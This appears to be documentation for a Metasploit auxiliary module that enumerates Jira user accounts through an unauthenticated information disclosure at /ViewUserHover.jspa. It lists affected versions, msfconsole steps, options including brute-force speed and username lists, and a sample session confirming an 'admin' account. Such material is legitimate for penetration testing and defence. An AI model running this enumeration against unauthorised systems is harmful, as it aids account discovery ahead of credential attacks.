2.4 KiB
2.4 KiB
Vulnerable Application
Jira Jira is team management software for agile teams.
This module has been tested successfully on:
- Jira version 8.4.1 on Ubuntu Linux.
- Jira version 8.4.1 on Kali Linux.
- Jira version 8.5.6 on Ubuntu Linux.
- Jira version 8.10.1 on Ubuntu Linux.
- Jira version 8.11.0 on Ubuntu Linux
Installers:
- Jira Installers
- [Jira Installers Archive] (https://www.atlassian.com/software/jira/download-archives)
Description
The module exploits an information disclosure vulnerability to allow an unauthenticated user to enumerate /ViewUserHover.jspa endpoint. This only affects Jira versions < 7.13.16, 8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.11.1 Discovered by Mikhail Klyuchnikov @mn1 https://twitter.com/ptswarm/status/1318914772918767619
Verification Steps
- Start
msfconsole - Do:
use auxiliary/scanner/http/jira_user_enum - Do:
set rhosts [IP] - Do:
set SSL true - Do:
set RPORT 443 - Do: `set USERNAME
- Do:
run - You should find out if the user exists or not
Options
- BRUTEFORCE_SPEED - How fast to bruteforce, from 0 to 5
- RHOSTS - The Target host(s)
- RPORT - Remote port hosting the Jira Application
- TAREGETURI - Path to Jira install on the webserver
- USERNAME - single username to attempt to enumerate
- USER_FILE - File of usernames to attempt to enumerate
Scenarios
msf6 > use auxiliary/scanner/http/jira_enum_users
msf6 auxiliary(scanner/http/jira_enum_users) > set rhosts 192.168.0.101
rhosts => 192.168.0.101
msf6 auxiliary(scanner/http/jira_enum_users) > set USERNAME admin
msf6 auxiliary(scanner/http/jira_enum_users) > run
[*] Begin enumerating users at 192.168.0.101/secure/ViewUserHover.jspa?username=
[*] checking user admin
[+] 'User exists: admin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/jira_enum_users) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.0.101 192.168.0.101 443/tcp (jira) admin